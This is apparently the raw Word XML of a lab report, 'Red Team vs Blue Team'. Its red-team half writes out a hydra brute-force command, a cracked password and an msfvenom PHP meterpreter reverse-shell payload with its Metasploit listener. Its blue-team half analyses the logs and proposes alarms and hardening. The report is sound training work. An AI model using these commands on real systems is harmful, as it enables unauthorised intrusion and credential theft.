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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="666666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color w:val="666666"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team VS Blue Team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62"/>
          <w:szCs w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mbjsiz6n6jlo" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="62"/>
          <w:szCs w:val="62"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue vs Red Team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38100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="horizontal line" id="20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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vydniszftb1n" w:id="1"/>
      <w:bookmarkEnd w:id="1"/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34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_arolcxe0i15c" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction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project demonstrates a Red Team vs. Blue Team scenario in which responsibilities of both a pentester and SOC analyst are used.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color w:val="980000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_la5jp5tnimjw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color w:val="980000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ff1zax6t5501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color w:val="980000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n2v55tl99thv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color w:val="980000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c3ba6erxywg6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0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="980000"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cvgus9e6v57e" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="980000"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42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color w:val="980000"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Ifconfig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to find out network IP address and network range  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298700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Netdiscover -r 192.168.1.255/16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Since we know the netmask is 255.255.255.0 that would be 16 bits of the subnet so then we can run the netdiscover command to discover other hosts on the network.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282700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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After running the command we can conclude that there are 3 hosts within the network with the IPs of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192.168.1.1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192.168.1.100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192.168.1.105.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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Now we need to discover what machine we need to get access to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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After checking up on the IPs we can conclude that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192.168.1.105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ended up being a web server.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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After checking the website we see open directories that show company information showing that this is a vulnerability in itself.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984500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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while exploring through the files we see an important directory being mentioned by the name of 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secret_folder.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Which can end up containing PII or important company documents.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886325" cy="66675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After going in the URL bar and typing in the secret folder found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192.168.1.105/company_folders/secret_folder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it then shows a login prompt meant for “Ashton” only.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086100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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After getting a username for a potential login we can then try to brute force the login by using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hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder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command.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42900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0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After using the command we successfully brute force the account and was able to retrieve the login information for ashton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812800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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="276" w:lineRule="auto"/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587500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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="276" w:lineRule="auto"/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spacing w:before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Logging in the account then brings us to a personal note Ashton then made for himself containing other important information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130300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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9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note that hes going to be using Ryans account </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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after researching more on the web server we found that Ryan is the CEO of the company.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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Hinting knowing that Ashton knows his login information with the hash giving at the top of the screen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before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Next step is to figure out the login to the file directory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dav://192.168.1.105/webdav/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using the hashed password at the top of Ashtons note. Using the website </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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https://crackstation.net/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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before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Cracking the hash we find the password is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linux4u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419100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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spacing w:before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Getting the login information to the company directory we know can exploit getting into the company system since the server has an open port 80 by creating a reverse shell script. The command being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msf venom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 -f raw &gt; newshell.php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838200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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spacing w:before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Once the reverse shell script is created we can now upload it to the shared directory to run it.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4559300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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spacing w:before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Before we run it we will want to run Metasploit to listen to the reverse shell on our host machine to access it remotely.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spacing w:before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commands would be used in this order to begin the listening </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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 exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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(same payload script as the one we copied to the shared directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Set LHOST 192.168.1.90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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Ip of machine we want to listen on </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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Port we want to listen on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Show options </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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see if all the settings we had set are correct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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Run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276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execute the listening process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spacing w:before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4686300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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0"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spacing w:before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Once this is completed we can now run the actual script through the shared directory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dav://192.168.1.105/webdav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which then after will then open up meterpreter on our host machine to show that we have now established connection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736600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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10"/>
        </w:numPr>
        <w:spacing w:before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After having the session open we can run basic commands to grab any other additional information about the system we got access to like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getuid.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 can also open up a shell terminal if needed by using the command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shell.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spacing w:before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 can now run the command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find -iname flag.txt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to grab the flag we are looking for one the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m8iimuc11oz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25" w:firstLine="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4a86e8"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z8iblssttdji" w:id="9"/>
      <w:bookmarkEnd w:id="9"/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                                  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4a86e8"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue Team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Analysis: Identifying the port scan</w:t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port scan occurred on October 4th 2021 at 11:52PM</w:t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254,496 packets were sent from the machine 192.168.1.90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Since there is such high network traffic when it should be idle it can be a sign of a port scan </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:before="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616200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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before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Analysis: Finding the Request for the hidden directory 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19,227 requests were made to this URL path. This path was requested by the IP address of 192.168.1.90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files that were requested had a hash that contained Ryan login credentials </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:before="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609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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6"/>
        </w:numPr>
        <w:spacing w:before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Analysis: uncovering the brute force attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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19,227 requests was made during the brute force attack to access the secret folder directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16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16,101 requests were made before the password was used correctly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:before="0"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0"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092200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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0"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079500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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0"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before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Analysis: Finding the WebDAV Connection</w:t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180,859 requests were made to this directory </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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files that were requested was the passwd file and also the php file used to initiate the reverse shell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409575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="355600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapNone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spacing w:before="0"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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4a86e8"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_55xo9lx6o7ma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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4a86e8"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1thgd3kenh5j" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4a86e8"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue Team Proposed Alarms and Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocking the Port Scan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2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0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Alarm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0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 alert to be sent to the team for a 1000+ port connections within a hour</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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7"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0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System Hardening </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="144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run multiple port scans to see what ports are being opened and if any are being used maliciously</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="144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make sure Firewall is up to date and to diminish any connections to the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding the Request for the Hidden Directory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Alarm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before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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For an alert on the system to detect if certain files and directory within the system are being accessed without permission</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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If these private files and directories are trying to be accessed more than 3 times the alert would then be sent to the team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:before="0"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System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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encrypt sensitive data and for files to not be shared with users outside the company being in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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4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make a whitelist to people who can and cant use these files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:spacing w:before="0"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before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation: Preventing Brute Force Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri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spacing w:before="0" w:line="276" w:lineRule="auto"/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Alarm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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 would implement a failed login alert to show a certain amount of times the login has failed </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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7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If the HTTP error code 401 is occurring multiple times an alert would be sent as well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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7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If there is more than 5 failed login attempts the alarm would be triggered</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:before="0"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spacing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System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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 lock out after to many attempts of logging in to prevent a brute force attack like the one implemented</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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8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require employees to have a complex password to mitigate the chances of getting a login attempt correctly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:before="0"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before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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Mitigation: Detecting the WebDav Connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0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3"/>
        </w:numPr>
        <w:spacing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Alarm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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 alert would be made to send the IP addresses trying to get access to webdav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2">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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5"/>
        </w:numPr>
        <w:spacing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System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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whitelist certain IP addresses so only certain machines can access WebDav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/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0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation: Identifying Reverse shell Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="2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u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/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pacing w:before="0" w:line="276" w:lineRule="auto"/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Alarm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="144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 alert can be shown when a file is being uploaded to the webdav folder and also the type of file being copied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
